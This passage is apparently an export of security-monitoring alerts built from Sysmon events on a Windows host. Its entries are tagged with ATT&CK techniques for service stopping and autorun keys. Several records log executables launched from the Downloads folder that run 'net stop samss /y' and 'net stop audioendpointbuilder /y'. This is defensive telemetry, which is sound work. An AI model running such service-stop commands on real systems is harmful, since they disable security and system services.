Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1a8e-5ec9-0000-0010967b0b00}\r\nParentProcessId: 6420\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 
12:43:59.058"",""processGuid"":""{df9fc3d3-1a8f-5ec9-0000-001044a70b00}"",""processId"":""6560"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1a8e-5ec9-0000-0010967b0b00}"",""parentProcessId"":""6420"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:44:10.912",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:43:58.730 +ProcessGuid: {df9fc3d3-1a8e-5ec9-0000-00103c8e0b00} +ProcessId: 6504 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: 
{df9fc3d3-1a8e-5ec9-0000-0010df6b0b00} +ParentProcessId: 6380 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:43:58.757889900Z"",""eventRecordID"":""1585"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:43:58.730\r\nProcessGuid: {df9fc3d3-1a8e-5ec9-0000-00103c8e0b00}\r\nProcessId: 6504\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1a8e-5ec9-0000-0010df6b0b00}\r\nParentProcessId: 6380\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 
12:43:58.730"",""processGuid"":""{df9fc3d3-1a8e-5ec9-0000-00103c8e0b00}"",""processId"":""6504"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1a8e-5ec9-0000-0010df6b0b00}"",""parentProcessId"":""6380"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:44:10.851",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:43:58.412 +ProcessGuid: {df9fc3d3-1a8e-5ec9-0000-0010967b0b00} +ProcessId: 6420 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: 
{df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:43:58.436877100Z"",""eventRecordID"":""1581"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:43:58.412\r\nProcessGuid: {df9fc3d3-1a8e-5ec9-0000-0010967b0b00}\r\nProcessId: 6420\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 
12:43:58.412"",""processGuid"":""{df9fc3d3-1a8e-5ec9-0000-0010967b0b00}"",""processId"":""6420"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:44:05.183",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:43:58.082 +ProcessGuid: {df9fc3d3-1a8e-5ec9-0000-0010df6b0b00} +ProcessId: 6380 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: 
{df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:43:58.133212600Z"",""eventRecordID"":""1580"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:43:58.082\r\nProcessGuid: {df9fc3d3-1a8e-5ec9-0000-0010df6b0b00}\r\nProcessId: 6380\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 
12:43:58.082"",""processGuid"":""{df9fc3d3-1a8e-5ec9-0000-0010df6b0b00}"",""processId"":""6380"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:43:30.367",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,, +"May 23, 2020 @ 12:43:24.516",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",, +"May 23, 2020 @ 12:42:28.913",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-23 12:42:28.085 +ProcessGuid: {df9fc3d3-d0cd-5ec7-0000-001050a30000} +ProcessId: 488 +Image: C:\Windows\system32\csrss.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Application Restart #0 +Details: C:\Program 
Files (x86)\Google\Chrome\Application\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:42:28.094377700Z"",""eventRecordID"":""1397"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-23 12:42:28.085\r\nProcessGuid: {df9fc3d3-d0cd-5ec7-0000-001050a30000}\r\nProcessId: 488\r\nImage: C:\\Windows\\system32\\csrss.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Application Restart #0\r\nDetails: C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-23 12:42:28.085"",""processGuid"":""{df9fc3d3-d0cd-5ec7-0000-001050a30000}"",""processId"":""488"",""image"":""C:\\\\Windows\\\\system32\\\\csrss.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Application Restart #0"",""details"":""C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session""}}}" +"May 23, 2020 @ 12:42:23.366",10,"Multiple System error events","""The server {D63B10C5-BB46-4990-A94F-E40B9D520160} did not register with DCOM within the required timeout.""",, +"May 23, 
2020 @ 12:42:20.152",10,"Multiple System error events","""The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.""",, +"May 23, 2020 @ 12:42:10.740",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:24:02.379 +ProcessGuid: {df9fc3d3-d272-5ec7-0000-0010d96a4700} +ProcessId: 295872 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d272-5ec7-0000-00100e654700} +ParentProcessId: 295780 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:02.382954200Z"",""eventRecordID"":""1366"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:24:02.379\r\nProcessGuid: {df9fc3d3-d272-5ec7-0000-0010d96a4700}\r\nProcessId: 295872\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 
(WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d272-5ec7-0000-00100e654700}\r\nParentProcessId: 295780\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:24:02.379"",""processGuid"":""{df9fc3d3-d272-5ec7-0000-0010d96a4700}"",""processId"":""295872"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d272-5ec7-0000-00100e654700}"",""parentProcessId"":""295780"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 
2020 @ 12:42:10.725",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:24:02.360 +ProcessGuid: {df9fc3d3-d272-5ec7-0000-00103a6a4700} +ProcessId: 295864 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d26e-5ec7-0000-0010010c4700} +ParentProcessId: 3208 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:02.370988300Z"",""eventRecordID"":""1365"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:24:02.360\r\nProcessGuid: {df9fc3d3-d272-5ec7-0000-00103a6a4700}\r\nProcessId: 295864\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d26e-5ec7-0000-0010010c4700}\r\nParentProcessId: 3208\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:24:02.360"",""processGuid"":""{df9fc3d3-d272-5ec7-0000-00103a6a4700}"",""processId"":""295864"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d26e-5ec7-0000-0010010c4700}"",""parentProcessId"":""3208"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:42:10.709",8,"ATT&CK T1489: Stop Windows 
Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:24:02.103 +ProcessGuid: {df9fc3d3-d272-5ec7-0000-00100e654700} +ProcessId: 295780 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:02.173226000Z"",""eventRecordID"":""1364"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:24:02.103\r\nProcessGuid: {df9fc3d3-d272-5ec7-0000-00100e654700}\r\nProcessId: 295780\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 